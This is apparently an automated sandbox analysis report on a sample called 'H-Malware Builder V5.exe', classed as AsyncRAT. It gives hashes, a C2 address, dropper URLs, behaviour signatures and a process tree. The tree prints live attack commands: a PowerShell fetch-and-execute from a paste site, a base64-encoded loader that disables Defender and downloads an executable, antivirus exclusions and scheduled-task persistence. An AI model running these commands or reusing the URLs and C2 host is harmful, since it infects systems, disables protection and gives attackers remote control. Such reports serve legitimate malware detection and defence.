Resubmissions

04-12-2024 07:47

241204-jmh8dsyjgs 10

03-12-2024 09:46

241203-lrs99szmav 10

Analysis

  • max time kernel
    105s
  • max time network
    116s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-12-2024 07:47

General

  • Target

    H-Malware Builder V5.exe

  • Size

    407KB

  • MD5

    c8f6d76b4ae82978272bde392561c4f4

  • SHA1

    80447d36fcf88cc9caa806db53e22d9468cc31ee

  • SHA256

    c981ebcf0c0cf857162ae35b9385c22d3198c2ec9ea00e37fcfe74a79eb3510e

  • SHA512

    10fa87f050a9ceb658e443317158ef8b1dbaa9e183ec61b5e5e42adb562f7918d996134aba7f0bbad852def4d6b0824c7b9716628b554194d0fd95974de6b2ad

  • SSDEEP

    12288:r5p4UNBN3aqeKNoRfwoZrHMBV9EwEcb8+DvtuWUb:r9N3aqPCRooZwBjEhcYcvYWUb

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://github.com/MalwareTeam/SecurityHealthService/raw/main/SecurityHealthService.exe

exe.dropper

https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

bay-helps.gl.at.ply.gg:36538

Mutex

DcRatMutex_qwqdanchun

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Async RAT payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 35 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 36 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 35 IoCs
  • Executes dropped EXE 2 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 57 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 47 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:608
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:64
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{5fc2a03c-bd98-4a7d-8d93-3d6b250e2228}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4992
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Drops file in System32 directory
        PID:668
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:944
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:388
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:512
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1080
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1096
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                  1⤵
                  • Indicator Removal: Clear Windows Event Logs
                  PID:1136
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:1152
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:2232
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                    1⤵
                      PID:1272
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1292
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                        1⤵
                          PID:1328
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                          1⤵
                            PID:1368
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1440
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:2832
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                1⤵
                                  PID:1572
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1604
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1628
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1720
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                        1⤵
                                          PID:1740
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1784
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1852
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                              1⤵
                                                PID:1932
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1940
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                  1⤵
                                                    PID:1520
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:1432
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                      1⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1532
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:2100
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                        1⤵
                                                          PID:2196
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                          1⤵
                                                            PID:2372
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                            1⤵
                                                              PID:2496
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                              1⤵
                                                                PID:2504
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                1⤵
                                                                • Drops file in System32 directory
                                                                PID:2668
                                                              • C:\Windows\sysmon.exe
                                                                C:\Windows\sysmon.exe
                                                                1⤵
                                                                  PID:2716
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                  1⤵
                                                                  • Enumerates connected drives
                                                                  PID:2736
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                  1⤵
                                                                    PID:2744
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                    1⤵
                                                                      PID:2776
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                      1⤵
                                                                        PID:2888
                                                                      • C:\Windows\system32\wbem\unsecapp.exe
                                                                        C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                        1⤵
                                                                          PID:3004
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                          1⤵
                                                                            PID:664
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                            1⤵
                                                                              PID:3312
                                                                            • C:\Windows\Explorer.EXE
                                                                              C:\Windows\Explorer.EXE
                                                                              1⤵
                                                                              • Modifies Internet Explorer settings
                                                                              • Modifies registry class
                                                                              • Suspicious behavior: AddClipboardFormatListener
                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                              • Suspicious behavior: RenamesItself
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:3432
                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                2⤵
                                                                                • Checks computer location settings
                                                                                • Drops startup file
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:1060
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                  3⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3904
                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
                                                                                  3⤵
                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                  • Checks computer location settings
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:1660
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
                                                                                    4⤵
                                                                                      PID:1568
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        5⤵
                                                                                          PID:4052
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell "irm pastie.io/raw/fgaazw | iex"
                                                                                          5⤵
                                                                                          • Blocklisted process makes network request
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1180
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAGEAbQBkAHIAMQBpAHkAbAB0AFQAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAE0AYQBsAHcAYQByAGUAVABlAGEAbQAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC8AcgBhAHcALwBtAGEAaQBuAC8AUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8ATQBhAGwAdwBhAHIAZQBUAGUAYQBtAC8AUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALwByAGEAdwAvAG0AYQBpAG4ALwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
                                                                                            6⤵
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2652
                                                                                      • C:\Windows\SYSTEM32\SCHTASKS.exe
                                                                                        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
                                                                                        4⤵
                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                        PID:644
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          5⤵
                                                                                            PID:2332
                                                                                        • C:\Windows\SYSTEM32\SCHTASKS.exe
                                                                                          "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
                                                                                          4⤵
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:1652
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            5⤵
                                                                                              PID:1672
                                                                                        • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                          3⤵
                                                                                          • Checks computer location settings
                                                                                          • Drops startup file
                                                                                          PID:116
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                            4⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2684
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              5⤵
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:2380
                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                            4⤵
                                                                                            • Checks computer location settings
                                                                                            • Drops startup file
                                                                                            PID:3656
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                              5⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              PID:3600
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                6⤵
                                                                                                  PID:864
                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                5⤵
                                                                                                • Checks computer location settings
                                                                                                • Drops startup file
                                                                                                PID:1404
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                  6⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  PID:2940
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    7⤵
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:5036
                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                  6⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Drops startup file
                                                                                                  PID:2136
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                    7⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    PID:2992
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      8⤵
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:3788
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                    7⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Drops startup file
                                                                                                    PID:2108
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                      8⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      PID:1836
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        9⤵
                                                                                                          PID:2224
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                        8⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Drops startup file
                                                                                                        PID:996
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                          9⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          PID:2064
                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            10⤵
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:3976
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                          9⤵
                                                                                                          • Checks computer location settings
                                                                                                          • Drops startup file
                                                                                                          PID:2948
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                            10⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            PID:684
                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              11⤵
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:2380
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                            10⤵
                                                                                                            • Checks computer location settings
                                                                                                            • Drops startup file
                                                                                                            PID:4328
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                              11⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              PID:4496
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                12⤵
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:2912
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                              11⤵
                                                                                                              • Checks computer location settings
                                                                                                              • Drops startup file
                                                                                                              PID:4892
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                12⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                PID:3420
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  13⤵
                                                                                                                    PID:1060
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                  12⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  • Drops startup file
                                                                                                                  PID:676
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                    13⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:1416
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      14⤵
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:1728
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                    13⤵
                                                                                                                    • Checks computer location settings
                                                                                                                    • Drops startup file
                                                                                                                    PID:1624
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                      14⤵
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      PID:4860
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        15⤵
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:4712
